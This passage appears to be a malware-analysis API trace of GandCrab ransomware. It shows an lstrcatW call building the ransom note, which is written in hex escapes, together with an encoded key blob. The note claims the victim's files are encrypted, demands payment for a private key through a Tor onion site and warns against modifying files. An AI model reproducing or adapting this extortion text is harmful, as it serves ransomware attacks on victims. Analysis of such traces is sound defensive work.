a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a" [0067.325] lstrcatW (in: lpString1="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a", lpString2="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n---END PC DATA---" | out: lpString1="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d